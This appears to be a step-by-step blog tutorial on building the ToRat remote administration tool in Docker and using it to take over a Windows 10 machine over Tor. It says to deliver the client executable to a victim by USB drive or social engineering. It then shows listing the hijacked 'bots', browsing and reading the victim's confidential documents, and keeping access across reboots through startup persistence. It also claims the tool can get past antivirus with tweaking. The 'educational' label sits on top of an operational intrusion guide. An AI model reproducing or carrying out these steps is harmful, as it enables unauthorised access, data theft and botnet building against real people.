Hack Windows 10 using ToRAT (Remote Administrator Tool) – Step By Step


ToRat is the Remote Administrator Tool. Using this tool, we can hack the victim’s machine if the victim don’t have any type of virus protection on his machine. This ToRat tool is completely built on the Go language by using the TOR transport machine. As per ethical hacking researcher with some tweaking it can bypass AV protection. We can run this tool in Windows, Linux clients operating systems. We can use this tool for educational purposes.


  • OS: ubuntu 18.04.4 64 bit
  • Kernel version: 5.3.0

Installation steps:

  • Before installing the tool, we have to install the docker engine – community

Docker Installation

  • Here, we will show how to install docker-engine in our OS.
  •  Now, use this command to update the packages
    •  sudo apt-get update
  • Next, use this command to install the packages.
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    gnupg-agent \
  • Now, use this command to add docker official GPG key.
    • curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add –
Install Docker Engine – Community
Use this command to update the packages sudo apt-get update
  • Now, verify docker engine community sudo docker run hello-world
root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo docker run hello-world
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
1b930d010525: Pull complete
Digest: sha256:f9dfddf63636d84ef479d645ab5885156ae030f611a56f3a7ac7f2fdd86d7e4e
Status: Downloaded newer image for hello-world:latest
Hello from Docker!
This message shows that your installation appears to be working correctly.

ToRat Installation

  • Use the cd command to enter into the directory.
    • cd ToRat/
root@ubuntu1-VirtualBox:/home/iicybersecurity# cd ToRat/
  • use this command to build a ToRat docker container.
    • sudo docker build . -t torat
Tool Execution Steps

  • Next, use this command to run the container.
    • sudo docker run -it -v “$(pwd)”/dist:/dist_ext torat
ToRat Tool
  • To find the options Use command help
  • The main step of the tool is to access the victim’s machine by sending a .exe file. We find the .exe file at this path. /home/iicybersecurity/ToRat/dist/dist/client# ls
root@ubuntu-VirtualBox:/home/iicybersecurity/ToRat/dist/dist/client# ls
client_linux  client-windows-4.0-amd64.exe
  • Download the client-windows-4.0-amd64.exe file and send this file to the victim through Pendrive or some social engineering techniques.
  • When the victims run this .exe file in his machine. We can see in the machine of our servers in this way like a new client connected.
Client Connected
  • Here we will see, what happens when victim executed the .exe file in windows machine.
  • Now, use the list command, to check the client hooked into server or we can say BOT created can be listed with this option.
BOT Client list
  • Here we listed out the client list.
  • Now, use select command and a number from the client list. To access the victim’s machine. Select 0 and then press Enter
Victim's Machine
  • Here we go to access of victims machine.
  • Now, let’s try to open any document which has confidential information on the victim machine.
  • Now, we are on the victim’s computer. Type dir command to check the directories in victims’ computers.
Victim’s Files
  • Here, we found a directory called Documents.
  • Now, let’s enter into Documents folder using command cd Documents and check the victim’s information.
Victim’s Documents
  • Here we see the information about the victim and in the same way, we can also view the documents by simply entering the file name using type command.
  • We see the complete information which is very confidential, which can be used for any illegal activities.
  • The main advantage of using this tool, we can access the victim’s machine anytime, across reboots by putting backdoor process in startup. So during digital forensics process, BOT’s processes are also identified.


ToRat (Remote Administrator Tool) hacking tool which works across TOR network to access bots. In this tool by sending a single .exe file to the victim, a normal system can be converted to BOT to work as zombies.